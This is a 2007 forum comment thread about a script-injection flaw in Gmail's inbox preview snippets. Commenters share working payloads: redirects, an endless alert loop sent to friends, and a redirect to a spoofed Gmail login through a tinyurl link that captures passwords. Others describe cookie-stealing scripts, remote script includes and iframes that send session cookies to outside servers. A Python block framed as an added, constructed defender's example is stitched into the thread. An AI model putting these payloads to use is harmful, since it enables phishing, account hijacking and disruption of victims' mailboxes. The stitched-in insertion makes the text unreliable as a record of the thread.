144 Comments
- ph3rny, on 10/12/2007, -0/+6
It's my blog, just so you know.
Although you could consider it self-promotion, how else am I supposed to post something like this?

- inactive, on 10/12/2007, -1/+7
"Keep your blog spam off digg *****"
Notice he posted "it's my blog just so you know. Although you could consider it self promotion how else am I supposed to post something like this."
He discovered this, and posted it in the only form he could think of (as he mentioned), so until you think of a better way for him to have shared it, STFU... marked as spam while I'm at it.
Anyway, I think they fixed it. I just made a fresh Yahoo account and emailed the exact code in the blog, and there was no alert to be seen.

- mikechml, on 10/12/2007, -0/+5
Seriously, why post it here? Why not just e-mail Google directly and avoid the frenzy of phishing?

- SSJemmett, on 10/12/2007, -0/+4
Take it from me... DO NOT put "location.replace("http://www.yahoo.com");" in the message body unless you want to be redirected to Yahoo every time you try to access your inbox. Basically, I can't access my email again until Google fixes this.

- outerspaceapple, on 10/12/2007, -0/+3
I bet you could include a .js file hosted remotely... then it's any man's game.

- pinkfu, on 10/12/2007, -0/+2
Why does everyone forget that Gmail is still beta?

- ph3rny, on 10/12/2007, -0/+2
Just to clear this up, I did report this to Google before putting this on digg...
And yes, it is fixed.

- ionut, on 10/12/2007, -0/+2
Try something like
document.location='http://www.cnn.com'
instead of the alert. It's really great to see the redirection. And it's pretty difficult to go back to Gmail. So beware.

- wthulhu, on 08/29/2009, -0/+2
The flaw still works; make sure you have a character BEFORE the < symbol, otherwise it will truncate it.
SCRIPT SRC= does work, which means this is really bad and can be pointed at a remote JS that has a lot more meat than the snippets.
Turning off snippets under Settings will stop this.

- inactive, on 10/12/2007, -0/+2
Totally amateurish security hole. Methinks the folks in Google's ivory towers lack a bit of street smarts... Maybe they should consider hiring some "dumb" people too. :D

- noamsml, on 10/12/2007, -1/+3
Eek, scary. In the meanwhile, all mails to me with the word "script" in them will be immediately archived and have the label "potentially dangerous" applied to them.

- outerspaceapple, on 10/12/2007, -0/+1
Hahaha, I just pr4nk3d two of my friends with the following
Subject: LOL
Body: dude!-script-alert("Eddy h4x0r3d you! Tell him he's cool! :-D");-/script- crazy.
It works like a charm from a Yahoo online account.

- sosbythefool, on 10/12/2007, -0/+1
I redirected to a spoofed GMail login that, when submitted, stores the username/password. I'm being nice though and let them know I did this :)
asd-script-window.location.href='http://tinyurl.com/zwxs2';-/script-asd

- trogdoor, on 10/12/2007, -0/+1
"I use gmail with outlook, am I still at risk?"
No.

- Patrick_, on 10/12/2007, -0/+1
This is why I'd never use Google's payment system... at least at first. I think _every_ single Google release of some new product has had at _least_ one vulnerability. Think about it... Maybe Google should've just stuck with searching.

- mikeon, on 10/12/2007, -0/+1
Wouldn't turning off preview snippets in the settings stop this?

- ph3rny, on 10/12/2007, -0/+1
Has nothing to do with this... it was fixed well before 3/25.

- LewsTherin, on 10/12/2007, -0/+1
If you're stupid enough to test with a redirect, you can fix it by disabling JavaScript in your browser, then deleting the e-mail.

- Hoohoonick, on 10/12/2007, -0/+1
Great, tell the world :P

- dognose, on 10/12/2007, -0/+1
Haha. I wrote a cookie stealing script, which I tried w/ my gmail account. It works, but now I can't get into my gmail, because it redirects to the cookie stealing site. Doh!

- a3r0, on 10/12/2007, -0/+1
How can you not do anything malicious? You can steal the user's cookies and log into their Gmail account, or forward them to a fake login page and take their password.

- ZenWarrior, on 10/12/2007, -0/+1
Great digg -- especially for a 14 y/o. Thanks!

- tweeto, on 10/12/2007, -0/+1
If you did manage to redirect your mailbox and you just can't get in, just send yourself 50 mails and you'll be able to get in...

- sosbythefool, on 10/12/2007, -0/+1
Still working for me at 5:19PM Central Time.
I sent some friends asdfwhile(true){alert('haha');}asdf
No email for them. :)
You can fix your email from something like this by:
In Firefox, turning off JavaScript.
Go to GMail.
Choose to load the Basic HTML version (does not have the vulnerability).
Delete the offending message.
Turn JavaScript back on.

- trogdoor, on 10/12/2007, -0/+0
Digg stripped the code; what I wrote in the message (which didn't work) was:
1{script}alert("test");{/script}1
where { = < and } = >

- Fredx, on 10/12/2007, -0/+0
Not the first, won't be the last...
Someone say "Google OS"?

- inactive, on 10/12/2007, -0/+0
Note: turning snippets off does eliminate the vulnerability in Gmail; not in google/ig though...

- a3r0, on 10/12/2007, -0/+0
It's not fixed yet. It was probably your email client escaping the symbols.

- ThatsUnpossible, on 10/12/2007, -0/+0
It's fixed. They're now escaping the < and > as expected to &lt; and &gt;

- FuzzyOnion, on 10/12/2007, -0/+0
I used the same code from the blog and while the alert didn't pop up, when I went to google.com, which I have set to use the personalized homepage, the page was all messed up. When I deleted the message and went back to the homepage, it was fixed.

- beta1, on 10/12/2007, -0/+0
thanx for the info I guess. And cool call "patrick_" - "This is why I'd never use Google's payment system"
haha

- __J__, on 10/12/2007, -0/+0
This is why gmail is still beta, I guess...

- drew112588, on 10/12/2007, -0/+0
Has anyone else gotten a message at the top of the gmail page saying that it is corrupt and that your firewall needs to be turned off.... hmmm

- pkulak, on 10/12/2007, -0/+0
Worked perfectly for me. That's crazy.

- inactive, on 10/12/2007, -0/+0
"why? because it's gmail. GOOGLE makes gmail. GOOGLE wouldn't do something so stupid. google is the greatest."
Exactly. It's Yahoo's fault for allowing people to send javascript in their emails.

- outerspaceapple, on 10/12/2007, -0/+0
yes, with a script src= javascript include, you could create an invisible iframe very easily and.... have phun?

- ahmerhussain, on 10/12/2007, -0/+0
"I use gmail with outlook, am I still at risk?"
You are at risk for a lot more things b/c u use outlook. In my opinion the Gmail web interface is superior to Outlook.

- dognose, on 10/12/2007, -0/+0
my inbox is still redirecting.

- didit, on 10/12/2007, -0/+0
>it's fixed. They're now escaping the < and > as expected to &lt; and &gt;
not for me. but code doesn't work :o(

- longman2g, on 10/12/2007, -0/+0
I just tested it, it still works.

- tforcram, on 10/12/2007, -0/+0
Ok, near as I can tell, if your email client uses the header Content-Type: text/html; and then doesn't escape the < and > characters (like yahoo), then it will run. Most clients will encode it, but even if they all did, this is still a gaping hole that anyone with a little SMTP knowledge could take advantage of. Coupled with the easy access to gmail addresses from google pages and we've got a fine recipe for disaster here.
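The mechanism tforcram describes (a text/html body whose < and > are dropped into the inbox preview unescaped) as an added, constructed example from a defender's side; this is not code from Gmail, Yahoo or anyone in this thread, and the sample mail, the 40-character snippet length and the `<span>` preview markup are assumptions:

```python
from email import message_from_string
from email.message import Message
import html
import re

# Constructed sample mail (not a real message): a text/html body carrying
# the payload shape discussed above, with a character before '<' so the
# preview does not truncate it.
SAMPLE_MAIL = (
    "From: sender@example.invalid\r\n"
    "To: victim@example.invalid\r\n"
    "Subject: LOL\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
    "\r\n"
    "asd<script>alert('test');</script>asd"
)

SNIPPET_LEN = 40  # characters shown in the inbox preview (assumed)


def body_text(msg: Message) -> str:
    """Return the decoded body of a single-part message as text."""
    payload = msg.get_payload(decode=True)
    return payload.decode(msg.get_content_charset() or "utf-8", "replace")


def vulnerable_snippet(raw: str) -> str:
    """The bug reproduced: the body is pasted into the preview markup as-is,
    so a text/html body becomes live HTML inside the inbox page."""
    msg = message_from_string(raw)
    return f"<span class='snippet'>{body_text(msg)[:SNIPPET_LEN]}</span>"


def safe_snippet(raw: str) -> str:
    """The fix: the body is data, never markup. Truncate first (so an entity
    is never cut in half), then HTML-escape before embedding."""
    msg = message_from_string(raw)
    text = body_text(msg)[:SNIPPET_LEN]
    return f"<span class='snippet'>{html.escape(text)}</span>"


def contains_active_content(raw: str) -> bool:
    """Detection helper: flag text/html mail whose body carries a script tag
    or an inline on* event handler (text/plain bodies render as text)."""
    msg = message_from_string(raw)
    if msg.get_content_type() != "text/html":
        return False
    return re.search(r"<\s*script\b|\bon\w+\s*=", body_text(msg), re.I) is not None
```

Escaping leaves the original characters visible in the preview (the reader still sees the literal `<script>` text) while the browser no longer parses them as tags.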
- bobgb4, on 10/12/2007, -0/+0
yeah this is not good... i tried and u can now put java code in messages

- ozzloy, on 10/12/2007, -0/+0
it worked for me for 2 messages, now it doesn't

- SilverRocket, on 10/12/2007, -0/+0
I can't seem to replicate it, but clearly this worked and was serious, so digg+++

- jupo, on 10/12/2007, -0/+0
Rather than a redirect, try creating an iframe that sends GMail's cookie value to a server side script elsewhere. If this can be used to hijack a session then it's a nightmare. One would expect though that the session is tied to an I.P. address, in which case it would be much more difficult to exploit. An even craftier approach would be to raise click events and extract desired email content from the interface's document, sending it elsewhere in the same fashion described above without requiring a valid session.

- superbnerd, on 10/12/2007, -0/+0
Worked for me the first time, didn't the second: on my own account.

- subodhgupta, on 10/12/2007, -0/+0
Still working at 1832 EST. :((

- tforcram, on 10/12/2007, -0/+0
Definitely not fixed yet; it looks like it has something to do with the MIME type that the mail client uses. Also it will only work the first time you load the inbox; as mentioned above, a refresh won't work. This is kinda scary.

- SP33DFR34K, on 10/12/2007, -0/+0
It also works if u have gmail preview for Google IG..